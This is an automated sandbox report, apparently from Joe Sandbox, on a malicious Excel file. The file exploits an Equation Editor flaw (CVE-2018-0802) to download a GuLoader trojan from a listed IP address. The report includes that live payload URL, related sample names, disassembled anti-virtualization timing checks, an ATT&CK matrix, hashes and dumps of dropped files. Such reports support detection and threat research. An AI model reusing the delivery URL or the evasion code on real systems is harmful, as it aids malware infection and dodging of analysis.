                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446454 rdtsc
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446454 rdtsc
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00444440 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004436DE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004490F5 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004464F9 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044993D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004443FB mov eax, dword ptr fs:[00000030h]
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: !Progman

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery22VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  BL_SGN11203184.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe31%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe59%ReversingLabsWin32.Trojan.Jaik
                  C:\Users\Public\vbc.exe31%MetadefenderBrowse
                  C:\Users\Public\vbc.exe59%ReversingLabsWin32.Trojan.Jaik

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://103.155.82.236/fksdoc/svchost.exe12%VirustotalBrowse
                  http://103.155.82.236/fksdoc/svchost.exe100%Avira URL Cloudmalware
                  https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://103.155.82.236/fksdoc/svchost.exetrue
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-cotrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.day.com/dam/1.0F77229A3.emf.0.drfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    103.155.82.236
                    unknownunknown
                    134687TWIDC-AS-APTWIDCLimitedHKtrue

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:432590
                    Start date:10.06.2021
                    Start time:15:16:10
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 21s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:BL_SGN11203184.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSX@4/16@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe
                    • TCP Packets have been reduced to 100

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    15:17:07API Interceptor70x Sleep call for process: EQNEDT32.EXE modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.155.82.236spices requirement.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fksdoc/svchost.exe
                    2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fwkdoc/svchost.exe
                    DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fwkdoc/svchost.exe

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWIDC-AS-APTWIDCLimitedHKspices requirement.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.95
                    Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.95
                    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                    • 103.155.93.93
                    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                    • 103.155.93.93
                    2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    PO (2).exeGet hashmaliciousBrowse
                    • 103.153.182.50
                    PO.exeGet hashmaliciousBrowse
                    • 103.153.182.50
                    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Outstanding_Debt_591538347_05242021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.157

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):147456
                    Entropy (8bit):5.607689655560483
                    Encrypted:false
                    SSDEEP:1536:Fttu3FssKUmvr9DJ1FJS1bQNZ6bp/+Dtr5m3XSt4lYS0eXJWUTFboob:ztu3alxx3fSQmbs55r4l6eXJWUB0ob
                    MD5:99BBF83ABE9D6E4ECC91493E32230833
                    SHA1:B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E
                    SHA-256:2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5
                    SHA-512:0F6B9F9A843F491B925AAB0AF5D4F08024A2D430C41022C23AFB46CE3ABDF7881E8D87AC6D93F5ADFC2F11AEE0F0BB0AC28FA2500EC118BC1ED496281D3AFEC6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Metadefender, Detection: 31%, Browse
                    • Antivirus: ReversingLabs, Detection: 59%
                    Reputation:low
                    IE Cache URL:http://103.155.82.236/fksdoc/svchost.exe
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......G.....................0............... ....@..........................P......0.......................................$...(....@..P...................................................................(... ....................................text............................... ..`.data...P.... ....... ..............@....rsrc...P....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E4E0F48.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):49744
                    Entropy (8bit):7.99056926749243
                    Encrypted:true
                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21A36D14.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):79394
                    Entropy (8bit):7.864111100215953
                    Encrypted:false
                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                    MD5:16925690E9B366EA60B610F517789AF1
                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\221576A9.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):84203
                    Entropy (8bit):7.979766688932294
                    Encrypted:false
                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE1779F.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79B68205.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):51166
                    Entropy (8bit):7.767050944061069
                    Encrypted:false
                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A9F521.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E0CA1A0.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):50311
                    Entropy (8bit):7.960958863022709
                    Encrypted:false
                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                    Malicious:false
                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988F9842.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):49744
                    Entropy (8bit):7.99056926749243
                    Encrypted:true
                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                    Malicious:false
